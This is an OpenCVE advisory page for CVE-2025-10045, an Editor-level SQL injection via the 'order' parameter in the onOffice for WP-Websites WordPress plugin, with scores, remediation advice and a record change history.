Description
The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Published: 2025-10-15
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: SQL Injection allowing authenticated Editor or higher users to extract confidential database information
Action: Update Plugin
AI Analysis

Impact

The onOffice for WP-Websites plugin is vulnerable to a SQL Injection flaw that originates from the "order" parameter. Unsanitized input combined with a lack of prepared statements enables an authenticated user with Editor privileges or greater to append arbitrary SQL commands to existing queries, allowing extraction of sensitive data stored in the WordPress database and compromising confidentiality.

Affected Systems

All installations of the onOffice for WP-Websites plugin whose version is 6.5.1 or older are affected. The provided data does not indicate that any newer release fixes the issue, so all such installations must be treated as vulnerable until the vendor supplies a corrected version.

Risk and Exploitability

The CVSS score of 4.9 places the vulnerability in a medium severity range, while the EPSS score of less than 1% suggests a low likelihood of exploitation in the wild. Compromise requires authenticated access with at least Editor privileges, limiting the attack surface. The flaw is not listed in the CISA KEV catalog. Nevertheless, an attacker who gains or controls an Editor account could read protected database content and potentially facilitate further attacks.

Generated by OpenCVE AI on April 27, 2026 at 23:41 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the onOffice for WP-Websites plugin to the latest available version, ensuring any future fixes address the SQL Injection flaw.
  • If an update cannot be applied immediately, reduce the number of users with Editor or higher roles or reassign those roles to users who do not need access to the plugin's features.
  • Disabling or removing the onOffice for WP-Websites plugin from the WordPress installation will eliminate the vulnerability while a fix is available.

Generated by OpenCVE AI on April 27, 2026 at 23:41 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 08 Apr 2026 17:30:00 +0000

Type Values Removed Values Added
References

Wed, 08 Apr 2026 17:00:00 +0000

Type Values Removed Values Added
Description The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Title onOffice for WP-Websites <= 5.7 - Authenticated (Editor+) SQL Injection onOffice for WP-Websites <= 6.5.1 - Authenticated (Editor+) SQL Injection
References

Tue, 25 Nov 2025 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

 ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 20 Oct 2025 13:30:00 +0000

Type Values Removed Values Added
First Time appeared Wordpress
Wordpress wordpress
Vendors & Products Wordpress
Wordpress wordpress

Wed, 15 Oct 2025 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 15 Oct 2025 08:45:00 +0000

Type Values Removed Values Added
Description The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Title onOffice for WP-Websites <= 5.7 - Authenticated (Editor+) SQL Injection
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}

Subscriptions

Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:42:27.079Z

Reserved: 2025-09-05T18:28:17.507Z

Link: CVE-2025-10045

cve-icon Vulnrichment

Updated: 2025-10-15T19:38:40.519Z

cve-icon NVD

Status : Deferred

Published: 2025-10-15T09:15:36.600

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-10045

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-27T23:45:15Z

Weaknesses